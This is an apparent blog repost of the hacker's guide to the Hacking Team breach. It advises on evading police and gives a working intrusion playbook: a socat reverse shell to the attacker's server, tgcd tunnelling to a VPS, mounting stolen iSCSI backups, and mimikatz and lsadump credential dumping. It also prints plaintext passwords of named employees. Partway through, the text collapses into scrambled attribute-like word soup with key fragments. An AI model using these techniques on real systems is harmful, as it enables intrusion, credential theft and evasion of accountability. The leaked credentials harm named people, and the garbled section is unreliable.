Saturday, May 7, 2016

The hacker who hacked the Hacking Team explains how he did it.

                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
                                  A DIY Guide

                              _,-\  o O_/;            
                             / ,  `     `|            
                             | \-.,___,  /   `        
                              \ `-.__/  /    ,.\      
                             / `-.__.-\`   ./   \'
                            / /|    ___\ ,/      `\
                           ( ( |.-"`   '/\         \  `
                            \ \/      ,,  |          \ _
                             \|     o/o   /           \.
                              \        , /             /
                              ( __`;-;'__`)            \\
                              `//'`   `||`              `\
                             _//       ||           __   _   _ _____   __
                     .-"-._,(__)     .(__).-""-.      | | | | |_   _| |
                    /          \    /           \     | | |_| | | |   |
                    \          /    \           /     | |  _  | | |   |
                     `'-------`      `--------'`    __| |_| |_| |_|   |__

--[ 1 - Introduction ]----------------------------------------------------------

You'll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there's plenty of hackers better than me,
but they misuse their talents working for "defense" contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics - the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.

You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!


--[ 2 - Hacking Team ]----------------------------------------------------------

Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.


--[ 3 - Stay safe out there ]---------------------------------------------------

Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple

1) Encrypt your hard disk [2]

   I guess when the police arrive to seize your computer, it means you've
   already made a lot of mistakes, but it's better to be safe.

2) Use a virtual machine with all traffic routed through Tor

   This accomplishes two things. First, all your traffic is anonymized through
   Tor. Second, keeping your personal life and your hacking on separate
   computers helps you not to mix them by accident.

   You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
   something custom [6]. Here's [7] a detailed comparison.

3) (Optional) Don't connect directly to Tor
   Tor isn't a panacea. They can correlate the times you're connected to Tor
   with the times your hacker handle is active. Also, there have been
   successful attacks against Tor [8]. You can connect to Tor using other
   peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
   cracking wifi. Another option is to connect to a VPN or a bridge node [10]
   before Tor, but that's less secure because they can still correlate the
   hacker's activity with your house's internet activity (this was used as
   evidence against Jeremy Hammond [11]).

   The reality is that while Tor isn't perfect, it works quite well. When I
   was young and reckless, I did plenty of stuff without any protection (I'm
   referring to hacking) apart from Tor, that the police tried their hardest
   to investigate, and I've never had any problems.


----[ 3.1 - Infrastructure ]----------------------------------------------------

I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:

1) Domain Names

   For C&C addresses, and for DNS tunnels for guaranteed egress.

2) Stable Servers

   For use as C&C servers, to receive connect-back shells, to launch attacks,
   and to store the loot.

3) Hacked Servers

   For use as pivots to hide the IP addresses of the stable servers. And for
   when I want a fast connection without pivoting, for example to scan ports,
   scan the whole internet, download a database with sqli, etc.

Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).

----[ 3.2 - Attribution ]-------------------------------------------------------

In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.

I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.

--[ 4 - Information Gathering ]-------------------------------------------------

Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.

----[ 4.1 - Technical Information ]---------------------------------------------

Some tools and techniques are:

1) Google

   A lot of interesting things can be found with a few well-chosen search
   queries. For example, the identity of DPR [1]. The bible of Google hacking
   is the book "Google Hacking for Penetration Testers". You can find a short
   summary in Spanish at [2].

2) Subdomain Enumeration

   Often, a company's main website is hosted by a third party, and you'll find
   the company's actual IP range thanks to subdomains like or Also, sometimes there are things that shouldn't be exposed
   in "hidden" subdomains. Useful tools for discovering domains and subdomains
   are fierce [3], theHarvester [4], and recon-ng [5].

3) Whois lookups and reverse lookups

   With a reverse lookup using the whois information from a domain or IP range
   of a company, you can find other domains and IP ranges. As far as I know,
   there's no free way to do reverse lookups aside from a google "hack":
   "via della moscova 13"
   "via della moscova 13"

4) Port scanning and fingerprinting

   Unlike the other techniques, this talks to the company's servers. I
   include it in this section because it's not an attack, it's just
   information gathering. The company's IDS might generate an alert, but you
   don't have to worry since the whole internet is being scanned constantly.

   For scanning, nmap [6] is precise, and can fingerprint the majority of
   services discovered. For companies with very large IP ranges, zmap [7] or
   masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web


----[ 4.2 - Social Information ]------------------------------------------------

For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:

1) Google

   Here as well, it's the most useful tool.

2) theHarvester and recon-ng

   I already mentioned them in the previous section, but they have a lot more
   functionality. They can find a lot of information quickly and
   automatically. It's worth reading all their documentation.

3) LinkedIn

   A lot of information about the employees can be found here. The company's
   recruiters are the most likely to accept your connection requests.


   Previously known as jigsaw. They have contact information for many

5) File Metadata

   A lot of information about employees and their systems can be found in
   metadata of files the company has published. Useful tools for finding
   files on the company's website and extracting the metadata are metagoofil
   [1] and FOCA [2].


--[ 5 - Entering the network ]--------------------------------------------------

There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.

----[ 5.1 - Social Engineering ]------------------------------------------------

Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.


----[ 5.2 - Buying Access ]-----------------------------------------------------

Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it's employees are infosec experts, so there was a low chance that they'd
already been compromised.

----[ 5.3 - Technical Exploitation ]--------------------------------------------

After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum: -
descr:          HT public subnet

Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].


--[ 6 - Be Prepared ]-----------------------------------------------------------

I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.

The post-exploitation tools that I'd prepared were:

1) busybox

   For all the standard Unix utilities that the system didn't have.

2) nmap

   To scan and fingerprint Hacking Team's internal network.


   The most useful tool for attacking windows networks when you have access to
   the internal network, but no domain user.

4) Python

   To execute

5) tcpdump

   For sniffing traffic.

6) dsniff

   For sniffing passwords from plaintext protocols like ftp, and for
   arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
   and NaGA, but it was hard to compile it for the system.

7) socat

   For a comfortable shell with a pty:
   my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
   hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \

   And useful for a lot more, it's a networking swiss army knife. See the
   examples section of its documentation.

8) screen

   Like the shell with pty, it wasn't really necessary, but I wanted to feel
   at home in Hacking Team's network.

9) a SOCKS proxy server

   To use with proxychains to be able to access their local network from any

10) tgcd

   For forwarding ports, like for the SOCKS server, through the firewall.


The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.

--[ 7 - Watch and Listen ]------------------------------------------------------

Now inside their internal network, I wanted to take a look around and think
about my next step. I started in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.

--[ 8 - NoSQL Databases ]-------------------------------------------------------

NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
|_    version = 2.6.5

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   databases
|_    version = 2.6.5

They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.


--[ 9 - Crossed Cables ]--------------------------------------------------------

Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn't very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork

Nmap scan report for ht-synology.hackingteam.local (
3260/tcp open  iscsi?
| iscsi-info:
|   Target:
|     Address:,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (
3260/tcp open  iscsi?
| iscsi-info:
|   Target:
|     Address:,0
|     Address:,0
|_    Authentication: No authentication required

iSCSI needs a kernel module, and it would've been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p

Now iSCSI finds the name but has problems mounting it
because it thinks its IP is instead of

The way I solved it was:
iptables -t nat -A OUTPUT -d -j DNAT --to-destination

And now, after:
iscsiadm -m node -p --login

...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big too download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

...and finally we've unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1


--[ 10 - From backups to domain admin ]-----------------------------------------

What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:

_SC_BlackBerry MDS Connection Service
0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.
0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!...........

I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient '//$' -U 'hackingteam.local/besadmin%bes32678!!!'

It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
got a bunch of passwords, including the Domain Admin:

HACKINGTEAM  BESAdmin       bes32678!!!
HACKINGTEAM  Administrator  uu8dd8ndd12!
HACKINGTEAM  c.pozzi        P4ssword      <---- -----begin="" -----end="" ----="" --="" -="" -append="" -contentfilter="" -excludedshares="" -ge="" -or="" -recurse="" -tc="" -u="" 0days="" 100="" 10="" 11="" 12="" 13.1="" 13.2="" 13.3="" 13="" 14="" 15="" 16="" 17="" 18="" 1="" 1s9i8m4o="" 2000="" 2003="" 27qifojglfhzym2gywiikr88y95yljxvrmnmjedwontecy68rnaoohjy="" 2="" 2o2571="" 3="" 445="" 4="" 4eaurd="" 4luc="" 5="" 7045="" _="" __="" ___="" ____="" a.mino="" a.scarafile="" a="" about="" above="" abuses.="" access.="" access="" account="" acked="" acking="" ackingteam="" active="" activists="" ad="" addition="" admin="" administer="" administrative="""" advantage="" after="" afterwards.="" akasqyazc7l5teospn5hdega7u5gpb="" all="" almost="" along="" already="" also="" always="" amministrazione="" amp="" an="" and="" andra="""" another="" anual_de_metasploit_unleashed.pdf="" any="" appear="""" are:="" are="" armando="" as="" assholes="" asymmetry="" at="" atches="" attack="" attempts="" author="" automated="" autostart-persistence="" av="" avoid="" backup="" banks="" bapy="" be="" beauty="" because="" before="" being="" best="" bidord="" blackou7="" blob="" block-----="" blocked="" blocks="""""" blog="""" blood="" blu3.b3rry="" bmf2e7ouihtodv4f="" bridge="" brief="" brycaweaah4baheaaaojedscprhoqsxqotwiai8yfrdtptbyel6khk2h8="" bug="" builtin="" businesses="" but="" by="" bypassuac="" byt3bl33d3r="" c.pozzi="" call="" can="" carabinieri="" case="" category="" cd4432996111="" cdwa8x="" challenge="" chance="" change="" choose="" christian="" clue="" code="" combination="" comes="" command="" commands="" common="" como-validarse-con-cualquier-usuario-como-admin.html="" companies="" company.="" company="" computer="" computers.="" computers="" conception="" conclusion="" consulting="" contact="" continuing="" control="" convenient="" copied="" coracurrier="" corporations="" could="" couple="" cqe="" cr3tac="" cra0nd0r6kkl0aryb="" creddump7="" credentials="" credman.ps1="" cronies="" csvde="" ct="" culiaos="" curiously="" cznbt9wgxtles="" d.martinez="" d.milan="" d.romualdi="" d0llguskx24yd1siagez4b57vznbs0az8hoqef0k="E5+y" d="" daniele="" data="" date="" dates="" day="" days="" db="" dcr3="" death="" dedicate="" default.="" default="" demonstration="" deserving="" design="" detected="" detection.="" development="" dgz6t="" diaz="" did="" didn="" different="" dir="" directory="" disabled="" disclaimer:="" diskstation="" dministrator="" do-exfiltration="" do="" dob66="" documentation="" documents="" doesn="" doing="" dollar="" domain.="" domain="" domains="" don="" down="" download.="" download="" downloaded="" downloading="" duqu="" during="" e.ciceri="" e.rabe="" e4yuo="" e="" each="" eam="" easy="" eceived="" edsudn341opb="" educational="" ejecucion-remota-con-powershell="" el-miedo-de-vigilar-a-los-vigilantes="" ella0314="" else="" email="" emails.="" emails="" empire.="" empire="" employee="" employees="" en-us="" enable="" enabled="" enabling="" encrypted="" end="" engineers="" ent="" eohapsis="" equally.="" erab="" ervice="" es="" escalation="" esktop="" especially="" etc.="" ete="" ethical="" ettore="" even="" event="" ever="" every="" everything="" example:="" example="" examples="" except="" execute="" executed="" executing="" execution="" experience="" exploit="" explore.="" export="" expropriating="" fae="" fae_diskstation.tar="" false="" far="" fascism.="" fascists.="" favorite="" fcm4ohxm4awkqqbaatquwaj3wxr="" fees="" fight="" file="" filenames="" files.="" files.txt="" files="" fileserver="""" firewall.="" firewall="" first="" fl4ne3edl2ai="" folders="" footprint="" for="" forgot="" format="" found="" from="" fsao0084d6nvsytpd6iwbvcgj1iqqwcq0otgrozdurvwz6lwytz8xk1kf0="" fsuuom="" fulldisclosure="" fullname="" fully="" fun="" function="" g.russo="""" gather="" gave="" gcbr0s0705="" general="" generate="" gentilkiwi="" get-keystrokes="" get-timedscreenshot="" get-timescreenshot="" get="" getting="" git="""" gitlab="" give="" gives="" golden="" gotten="" government="" governments="" gpo="" granting="" great="" gui="" guide="" guides="" hack="" hacked.="" hacker="" hackers="" hacking.="""" hacking:="" hacking="" hackingteam="" had="" handling.="" harmj0y="" has="" hash.="" hash="" have="" he="" heart="" helps="" here="" high-uptime="" high="" him.="" his="" hobbies="" hours="" how-to-perform-bulk-downloads-of-files-in-sharepoint="" how="" however="" ht2015="" http:="" https:="" human="" hunting="" i-have-the-powerview="" i-hunt-sysadmins="" i="" if="" ileserver="" imagine="" impacket="" important="" in="" included="" incognito="" increases="" individuals.="" info="" information.="" information="" infrastructure="" initiated="" inject="" injection="" inside="" inspired="" install="" interesting="" interface="" internal="" into="" introduction="" invalid="" investigate.="" investigators="" invoke-sharefinderthreaded="" invoke_psexec="" invoke_wmi="" iolk="" ip3mebzfjx8="" ipc="" iqe3bbmbcgahbqjxavpfahsdbqsjcacdbrukcqgl="" is="" isn="" isolated="" it.="" it="" italian="" itself="" jclocsnbxb8ccemxnqlzwjgvbvgqyaf49rhyn9="" jf9j2g="" jizkoio9ytpnamhrq="" jkp0xtoqgf5nh="" jm3tccfn074hl37edt0z9p="" june-2015="" june="" just="" jyyjou4zux77im3="" keep="" kerberos="" key="" keyloggers="" keylogging="" knowledge="" known="" l.guerra="" l.invernizzi="" l0r3nz0123="" l8vj5pys="" larger="" later="" lateral-movement-with-high-latency-cc="" lateral="" lateral_movement="" laugh="" lbplggvsnv="" leak="" leaking="" learn="" least="" leave="" leaves="" leisure="" lgwpg17vwxsyoa4zwkhdd="" lib="" like="" line="" list="" ll="" local="" locale.="" logged="" login="" logs.="" lol="" long="" lot="" lwvsr7nwcukzglzcq3jpmsy1vljcrmc4hxnfegi9ax1fh28ryhudh8pecngkh="" m.bettini="" m.luppi="" m.romeo="" m8xwape73h="" made="" mail="" makes="" manager="" manuales="" many="" master="" material="" mauro="" me="" metasploit="" meterpreter-kiwi-extension-golden-ticket-howto="" meterpreter="" method.="" method="" mf2va3oqf22vgwqbk1mok="" microsoft="" migrate="" milan="" mimikatz.="" mimikatz="" missing="" module="" module_source="" modules="" money="" monitor="" month="" more="" most="" mounted="" movement:="" movement="" mpire="" mqenbfvp37mbcacu0rmidtotn98nurhupyyi3fua="" ms14-068="" ms3gckaj30jnpc="" msi="" mubix="" multi-million="" my="" n1nj4sec="" n5a6hfmctrzjexcckfaqlwalhnrp6mrfzgku6="" n="" nabkz="" nagios="" names="" need="" needed.="" needed="" net="" netview.exe="" netview="" network.="" network="" networks.="" networks="" never="" new-mailboxexportrequest="" new="""" nfrastrutturait="" nishang="" no="" no_psexec_needed="" not="" nothing-lasts-forever-persistence-with-empire="" noticed="" now="""" nvoke-bypassuac.ps1="" nvoke-runas.ps1="" o3detng0r="" obtaining="" of="" off="" often="" ogin="" ohogg0omnuhnrs56elryb="" old="" olume="" on="" once="" one="" only="" ooeqkxteyaymuwyxadsj7ocfrsyhyrvsmb4gzba1bo8rxrrtva0vzk8ua0db1zzr="" open="" opened="" option="" or="" order="" ordinary="" oresecurity="" other="" out-file="" owershell-credentials-d44c3cde="" owershell-suite="" owershellempire="" owershellmafia="" owersploit="" owertools="" owerup="" owerview="" own="" p6mgg="" p="2535" page_id="41" part="" pass="" password.="" password="" passwords.="" passwords="" pay="" pbvmhh894wozivulp86twjwgxlu1khfo7jdgp8ykrgsxv0mvfav70qxthllxoay9="" penetesting="" people="" permission="" persistence="" person="" pgp="" phishing="" piece="" place="" please:="" plenty="" police="" port="" ports="" powerful="" powershell="" powersploit="" powerup="" powerview-2-0="" powerview:="" powerview="" pozzi="" pre="" presence="" privesc="" privilege="" privileges.="" privileges="" problem="" process="" processes.="" programs="" projects="" protocols.="" protocols="" provides="" proxy="""" proxychains="" psexec.aspx="" psexec="" psexec_psh="" psinject="" psremoting="" pth-toolkit="" pth-winexe="" pth-wmis="" public="" pupy="" purposes="""" pykek="" q="" qdqvnddp6nbp2rvpw="" qgsafqvl4pjbx="" quite="" r.viscardi="" r="" raid="" ram="" rat="" rbxpdpfojamfyyyjm="" rcormier="" rcs.="" rcs="" rd13136f="" re="" read="" reading="" reality="" really="" rebellious="" reboot="" recommend="" reconnaissance="" redteaming="" remote="" repos.="" require="" requires="" reset="" resetting="" resources="" rete="" returned="" reusing="" review="" rights="" risk="" rmzz9ett0j3uwx0wo42zooxmbad2jgjxsi9="" romeo="" roups="" ruecrypt="" runas="" s.gallucci="" s="" saeqeaaykbhwqyaqiacqucvwnfswibdaak="" same="" samratashok="" saw="" say="" says="" sc="" scheduled="" school="" schtasks="" scraping="" screen="" screenshots="" script="" scriptcenter="" searched="""" secure="""" see="" seeing="" seems="" seen="" sekurlsa::logonpasswords="" sekurlsa::msv="" sekurlsa::pth="" select-string="" select="" send="" server="" servers.="" servers="" service="" session="" set="" sharepoint="" shares="" should="" simple="" since="" situations="" sleep.="" small="" smb="" smbclient="" so="" software="" some="" something="" sometimes="" source="""" spear="" spilled="" spreading="" spy="" spying="" start="" started="" status="" stealing="" stealthy.="" stealthy="" step="" still="" stop="" store="" story="" sudo="" sviluppo="" sysadmin="" sysadmins.="" sysadmins="" sysinternals="" systems="" t-="" t6m1pwofvdn3e2jngs1qv2ypbdog1hqj6riea="" t="" tag="Active+Directory" take="" takes="" target.="" target="" task="" tasks="" team="""" techniques="" test="" textfile="" than="" thanks="" that.="" that="" the="" their="" them="" themselves="" then="" there="" these="" they="" this="" those="" threats="" thulhusec="" thunderbird_usarenigmail="" ticket="" tickets="" time="" timofonica="" tk2xf7hxay4bbdeqeodlspybzexugzm6gc5aq0e="" to="" together="" token::="" token="" tokens="" took="" tool.="" tool="" tools="" torrent="" tradition="" tree="" tried="" true="" truecrypt="" try="" ttnpk0sldf="""" twitter="" two="" txt="" type="" unauthenticated="" underdog="" understanding="" undo="" universal="" until="" upon="" us="" use="" used:="" used="" useful="" user.="" user="" users="" using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst="" using="" uu8dd8ndd12="" uzzysecurity="" v="rpwrKhgMd7E" validation="" vdzlhkfgelvsns5osimbkhv4z2bzvvc1w="" ve="" veil-powerview-a-usage-guide="" very="" victims="" view="" viewtopic.php="" vincenzetti="" volume="" vuwwqaubmjtrdmtgharv="" vwnfsweianaqa8ffyiixywjvizusvgbjtto7wfunflg4f="" vymvbikjzoxk9enaxyigkl8ldohonz5lagrarousmiu8jcc6hwlhwjlrkcti9lp8="" w.furlan="" w4tudul3sp="" waited="" want.="" want="" was="" watch="" way="" we="" weak="" web="" weeks="" well="" weones="" were="" what="" when="" where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems="" where="" which="" who="" whole="" will="" win.="" windows.="" windows="" winexe="" with="" within="" withing="" without="" wlbp72gpyiwq="" wmi="" wmic="""" wmiexec="" wmigphowto.shtml="" work="" worked.="" working="" works="" worth="" wqrabebaag0iehhy2sgqmfjayegpghh="" written="""""""""""""""""""""""""""""""" x1nxbiw8sqgeh0a="" x2nyuoywm3oxigqohoan="" x="" xjujoxj="" y2tiywnrqhjpc2v1cc5uzxq="" year.="" years="" you.txt="" you="" your="" zyqxqnzlq5ea6mzuzzl9px8en2objzgak4qvxq31udh="">

No comments:

Post a Comment